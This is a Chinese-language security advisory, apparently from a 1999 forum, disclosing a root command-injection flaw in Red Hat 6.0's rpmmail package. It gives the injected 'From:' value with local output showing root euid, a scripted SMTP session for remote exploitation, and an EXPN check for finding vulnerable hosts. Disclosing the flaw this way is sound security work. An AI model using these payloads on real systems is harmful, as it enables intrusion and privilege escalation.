Red Hat 6.0最新rpmmail本地/远程漏洞
在Red Hat 6.0的附加CD中,有一个软件包,叫作rpmmail package。安装后的 rpmmail存在严重的ROOT级 的漏洞。此漏洞可能会使远程/本地的普通用户获得ROOT权,或以"nobody"身份远 程执行任意指令。
给rpmmail@vulnerablehost发送一封e-mail,可以使/home/rpmmail/rpmmai l (默认设置为suid root,能 由.forward远程执行)向system(3)执行任何你所希望的指令。指令的执行并不一 定需要ROOT权限,因为bash's handling of euid != uid of caller。虽然system(3)调用/bin/sh -c,但在某 些linux系统的默认设置下, 比如SuSE 6.2,其被联结至/bin/bash v2。从system(3)连机手册可知,此漏洞在 /bin/sh为bash version 2的 系统中无效,因为自bash version 2开始,/bin/sh在启动时,取消了原来所具有 的特殊权限。因此,一些安 装了rpmmail的系统存在 远程/本地ROOT 漏洞。所有没有特殊权限others组的用 户都可以远程执行指令。
本地漏洞如下:
/bin/sh is linked to /bin/bash (default SuSE 6.2 behavior: bash-2.03$ ls -la /bin/sh lrwxrwxrwx 1 root root 9 Oct 5 11:27 /bin/sh -> /bin/bash bash-2.03$ cat /etc/SuSE-release;uname -a;id SuSE Linux 6.2 (i386) VERSION = 6.2 Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown
uid=100(xnec) gid=100(users) groups=100(users) bash-2.03$ echo "From: ;/usr/bin/id;" | /home/rpmmail/rpmmail -c b ah Could not open config file! sh: Y: command not found uid=100(xnec) gid=100(users) groups=100(users) Could not open acknowledge file! bash-2.03$
----
After linking /bin/sh to /bin/ksh instead:
bash-2.03$ ls -la /bin/sh lrwxrwxrwx 1 root root 8 Oct 5 11:09 /bin/sh -> /bin/ksh bash-2.03$ cat /etc/SuSE-release;uname -a;id SuSE Linux 6.2 (i386) VERSION = 6.2 Linux fear62 2.2.10 #1 Tue Jul 20 16:32:24 MEST 1999 i686 unknown
uid=100(xnec) gid=100(users) groups=100(users) bash-2.03$ echo "From: ;/usr/bin/id;" | /home/rpmmail/rpmmail -c b ah Could not open config file! sh: Y: not found uid=100(xnec) gid=100(users) euid=0(root) egid=0(root) groups=100( users) Could not open acknowledge file! bash-2.03$
远程漏洞如下: bash-2.03$ telnet localhost 25 Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. 220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999 11: 31:13 -0500 (CDT) MAIL FROM: ;/command/to/execute; 250 <;/command/to/execute;> ... Sender Okay RCPT TO: rpmmail 250 <rpmmail> ... Recipient Okay data 354 Enter mail, end with "." on a line by itself
250 Mail accepted quit
对有此项漏洞主机的确认非常简单,可以通过EXPN命令来校验.forward是否 存在: 220 fear62 Smail-3.2 (#1 1999-Jul-23) ready at Tue, 5 Oct 1999 11: 38:44 -0500 (CDT) EXPN rpmmail 250 "| /home/rpmmail/rpmmail -c /home/rpmmail/rpmmail.conf"
-- 欢迎大家常来回合策略 宗教信仰坐坐。 欢迎光临魔法师学院http://wwwmagic.126.com * * * * * 无挂碍故无有恐怖 --DOS--
※ 来源:.网易虚拟社区北京站 http://bj.netease.com.[FROM: 202.106.250.155]
|
|